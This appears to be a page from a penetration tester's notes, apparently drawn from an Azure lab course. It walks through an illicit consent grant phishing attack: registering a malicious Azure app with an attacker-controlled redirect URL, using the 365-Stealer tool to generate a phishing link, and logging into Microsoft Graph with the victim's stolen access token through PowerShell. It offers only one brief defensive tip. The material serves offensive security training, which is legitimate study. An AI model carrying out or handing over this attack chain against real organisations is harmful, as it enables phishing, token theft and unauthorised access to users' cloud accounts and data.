Illicit Consent Grant

When we have initial access to a user, we can create a application (this is a default setting).

A recommendation is to deny users to create applications

With this application we can ask another user to consent their permissions to our application. When the user consents, we get their access token. With this access token we can interact with perhaps the Graph API.

Illicit Consent Grant attack explained

Attack

We first go to https://portal.azure.com and register a application from our initial access user. We should use a url that we own as redirect url. So for example https://172.16.10.10/login/authorized. For the permissions, we add User.ReadBasic.All:

Next, we spin up a tool called 365-stealer. Which is a tool created by Altered Security to give a GUI to manage our phishing attack. https://github.com/AlteredSecurity/365-Stealer. This tool allows us to fill in the app's information:

If we save and run the attack, a shell pops up with a phishing link:

We sent this link to the victim. If the victim consents to our application, we receive a update on the GUI:

We can copy the access_token and use that to connect to Microsoft Graph.

PS C:\Windows\system32> $token = 'eY.....'
PS C:\Windows\system32> Connect-MgGraph -AccessToken ($Token | ConvertTo-SecureString -AsPlainText -Force)
Welcome to Microsoft Graph!

Connected via userprovidedaccesstoken access using bd46fc07-1626-43be-80b7-fkfkfkf
Readme: https://aka.ms/graph/sdk/powershell
SDK Docs: https://aka.ms/graph/sdk/powershell/docs
API Docs: https://aka.ms/graph/docs

NOTE: You can use the -NoWelcome parameter to suppress this message.

PS C:\Windows\system32> Get-MgContext


ClientId               : bd46fc07-1626-43be-80b7fgfgfgfgff
TenantId               : 2d50cb29-5f7b-48a4-87ceffgffgfgfg
Scopes                 : {User.Read, User.ReadBasic.All, profile, openid...}
AuthType               : UserProvidedAccessToken
TokenCredentialType    : UserProvidedAccessToken
CertificateThumbprint  :
CertificateSubjectName :
SendCertificateChain   : False
Account                : [email protected]
AppName                : student60
ContextScope           : Process
Certificate            :
PSHostVersion          : 5.1.17763.1490
ManagedIdentityId      :
ClientSecret           :
Environment            : Global

PreviousPrivilege EscalationNextMacro enabled Word-files (Revshell)

Last updated